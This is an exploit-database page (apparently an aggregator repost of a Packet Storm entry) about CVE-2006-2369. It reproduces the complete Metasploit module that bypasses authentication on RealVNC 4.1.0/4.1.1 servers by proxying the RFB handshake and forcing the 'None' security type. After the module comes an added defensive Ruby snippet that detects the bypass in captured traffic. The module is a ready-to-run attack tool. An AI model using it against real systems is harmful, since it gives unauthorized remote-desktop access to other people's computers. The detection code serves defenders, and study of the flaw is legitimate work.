RealVNC Authentication Bypass

Published: 26 Aug 2011 00:00:00
Reported by: H D Moore
Type: packetstorm
Source: packetstormsecurity.com
Views: 63

Authentication bypass in RealVNC Server versions 4.1.0 and 4.1.1. The module sets up a proxy listener on LPORT and proxies the connection to the target server; it also handles the remaining proxy operations between the two sockets once authentication has been bypassed.

Related

| Family | Title | Published | Source |
|---|---|---|---|
| 0day.today | RealVNC Authentication Bypass | 26 Aug 2011 00:00 | zdt |
| GithubExploit | Exploit for Improper Authentication in Vnc Realvnc | 8 Mar 2026 08:00 | githubexploit |
| Circl | CVE-2006-2369 | 26 Aug 2011 00:00 | circl |
| Check Point Advisories | RealVNC Password Authentication Bypass (CVE-2006-2369) | 25 May 2006 00:00 | checkpoint_advisories |
| CVE | CVE-2006-2369 | 15 May 2006 16:00 | cve |
| Cvelist | CVE-2006-2369 | 15 May 2006 16:00 | cvelist |
| Debian CVE | CVE-2006-2369 | 15 May 2006 16:00 | debiancve |
| Exploit DB | RealVNC - Authentication Bypass (Metasploit) | 26 Aug 2011 00:00 | exploitdb |
| Exploit DB | RealVNC 4.1.0/4.1.1 - Authentication Bypass | 13 May 2012 00:00 | exploitdb |
| exploitpack | RealVNC 4.1.04.1.1 - Authentication Bypass | 13 May 2012 00:00 | exploitpack |
```ruby
##
# $Id: realvnc_41_bypass.rb 13641 2011-08-26 04:40:21Z bannedit $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'RealVNC Authentication Bypass',
      'Description'    => %q{
        This module exploits an Authentication Bypass Vulnerability
        in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy
        listener on LPORT and proxies to the target server

        The AUTOVNC option requires that vncviewer be installed on
        the attacking machine. This option should be disabled for Pro
      },
      'Author'         =>
        [
          'hdm', # original msf2 module
          'TheLightCosine <thelightcosine[at]gmail.com>'
        ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 13641 $',
      'References'     =>
        [
          ['BID', '17978'],
          ['OSVDB', '25479'],
          ['URL', 'http://secunia.com/advisories/20107/'],
          ['CVE', 'CVE-2006-2369'],
        ],
      'DisclosureDate' => 'May 15 2006'))

    register_options(
      [
        OptAddress.new('RHOST', [true, 'The Target Host']),
        OptPort.new('RPORT', [true, "The port the target VNC Server is listening on", 5900 ]),
        OptPort.new('LPORT', [true, "The port the local VNC Proxy should listen on", 5900 ]),
        OptBool.new('AUTOVNC', [true, "Automatically Launch vncviewer from this host", true])
      ], self.class)
  end

  def run
    # Starts up the listener server
    print_status("starting listener")
    listener = Rex::Socket::TcpServer.create(
      'LocalHost' => '0.0.0.0',
      'LocalPort' => datastore['LPORT'],
      'Context'   => { 'Msf' => framework, 'MsfExploit' => self }
    )

    # If the AUTOVNC option is set to true this will spawn a vncviewer on the local machine
    # targeting the proxy listener.
    if (datastore['AUTOVNC'])
      unless (check_vncviewer())
        print_error("vncviewer does not appear to be installed, exiting!!!")
        return nil
      end
      print_status("Spawning viewer thread")
      view = framework.threads.spawn("VncViewerWrapper", false) {
        system("vncviewer 127.0.0.1::#{datastore['LPORT']}")
      }
    end

    # Establishes the connection between the viewer and the remote server
    client = listener.accept
    add_socket(client)

    s = Rex::Socket::Tcp.create(
      'PeerHost' => datastore['RHOST'],
      'PeerPort' => datastore['RPORT'],
      'Timeout'  => 1
    )
    add_socket(s)
    serverhello = s.gets
    unless serverhello.include? "RFB 003.008"
      print_error("The VNCServer is not vulnerable")
      return
    end

    # MitM attack on the VNC authentication process
    client.puts(serverhello)
    clienthello = client.gets
    s.puts(clienthello)
    authmethods = s.recv(2)
    print_status("Auth Methods Received. Sending Null Authentication Option to Client")
    client.write("\x01\x01")
    client.recv(1)
    s.write("\x01")
    s.recv(4)
    client.write("\x00\x00\x00\x00")

    # Handles remaining proxy operations between the two sockets
    closed = false
    while(closed == false)
      sockets = []
      sockets << client
      sockets << s
      selected = select(sockets, nil, nil, 0)
      #print_status("Selected: #{selected.inspect}")
      unless selected.nil?
        if selected[0].include?(client)
          #print_status("Transferring from client to server")
          begin
            data = client.sysread(8192)
            if data.nil?
              print_error("Client Closed Connection")
              closed = true
            else
              s.write(data)
            end
          rescue
            print_error("Client Closed Connection")
            closed = true
          end
        end
        if selected[0].include?(s)
          #print_status("Transferring from server to client")
          begin
            data = s.sysread(8192)
            if data.nil?
              print_error("Server Closed Connection")
              closed = true
            else
              client.write(data)
            end
          rescue
            closed = true
          end
        end
      end
    end

    # Garbage collection
    s.close
    client.close
    print_status("Listener Closed")

    if (datastore['AUTOVNC'])
      view.kill
      print_status("Viewer Closed")
    end
  end

  def check_vncviewer
    vnc =
      Rex::FileUtils::find_full_path('vncviewer') ||
      Rex::FileUtils::find_full_path('vncviewer.exe')
    if (vnc)
      return true
    else
      return false
    end
  end
end
```
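The module above works because a vulnerable server accepts security type 1 (None) even though its own offer list only contained VNCAuth. The following is an added example, not part of the Metasploit module or of RealVNC, showing how a defender can spot that condition passively: it parses the two directions of a captured RFB 3.7/3.8 handshake (the `s2c`/`c2s` byte streams, `SEC_TYPE_NAMES`, `analyze_rfb_handshake` and `describe` are all constructed here) and flags a client that picks an unoffered type plus a server that answers with SecurityResult 0 anyway.

```ruby
# Security-type names from the RFB spec, for readable reports (constructed lookup).
SEC_TYPE_NAMES = { 1 => 'None', 2 => 'VNCAuth', 16 => 'Tight', 19 => 'VeNCrypt' }.freeze

# s2c = server-to-client bytes, c2s = client-to-server bytes of one session, as
# reassembled from a capture. Returns a hash with the parsed handshake and a verdict.
def analyze_rfb_handshake(s2c, c2s)
  s2c = s2c.b
  c2s = c2s.b
  r = { version: nil, offered: [], chosen: nil, accepted: nil, verdict: :ok }
  # Both sides open with the 12-byte ProtocolVersion message "RFB xxx.yyy\n".
  return r.merge(verdict: :not_rfb) unless s2c.start_with?('RFB ') && c2s.start_with?('RFB ')
  r[:version] = s2c[4, 7]
  # Only 3.7 and 3.8 let the client pick from a list (3.3 is server-chosen).
  return r.merge(verdict: :unsupported_version) unless %w[003.007 003.008].include?(r[:version])

  # Server: one count byte, then that many security-type bytes. A count of 0
  # means the server refused the connection and a reason string follows.
  count = s2c.getbyte(12)
  return r.merge(verdict: :truncated) if count.nil?
  return r.merge(verdict: :server_refused) if count.zero?
  offered = s2c.byteslice(13, count)
  return r.merge(verdict: :truncated) if offered.nil? || offered.bytesize < count
  r[:offered] = offered.bytes

  # Client: a single byte naming the type it wants to use.
  chosen = c2s.getbyte(12)
  return r.merge(verdict: :truncated) if chosen.nil?
  r[:chosen] = chosen
  return r if r[:offered].include?(chosen) # honest negotiation

  # The client asked for a type the server never offered. In 3.8 a server that
  # accepts type 1 (None) replies at once with a 4-byte SecurityResult of 0,
  # which is exactly what the proxy module relays back to the viewer.
  sec_result = s2c.byteslice(13 + count, 4)
  accepted = r[:version] == '003.008' && chosen == 1 &&
             !sec_result.nil? && sec_result.bytesize == 4 && sec_result.unpack1('N').zero?
  r[:accepted] = accepted
  r[:verdict] = accepted ? :auth_bypass_succeeded : :unoffered_type_requested
  r
end

def describe(v)
  names = ->(t) { SEC_TYPE_NAMES.fetch(t, "type #{t}") }
  "RFB #{v[:version]}: offered=#{v[:offered].map(&names)} chosen=#{v[:chosen] && names[v[:chosen]]} verdict=#{v[:verdict]}"
end

# Constructed sample: server offers only VNCAuth (2), client picks None (1),
# vulnerable server answers SecurityResult OK. A patched server answers 1 (failed).
BYPASS_S2C = "RFB 003.008\n\x01\x02\x00\x00\x00\x00".b
BYPASS_C2S = "RFB 003.008\n\x01".b
puts describe(analyze_rfb_handshake(BYPASS_S2C, BYPASS_C2S))
```

A `:unoffered_type_requested` verdict alone is worth an alert, since a legitimate viewer never selects a type outside the server's list; `:auth_bypass_succeeded` means the server on the capture is unpatched.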


Vulners AI Score: 0.5 (Low risk)
EPSS: 0.91522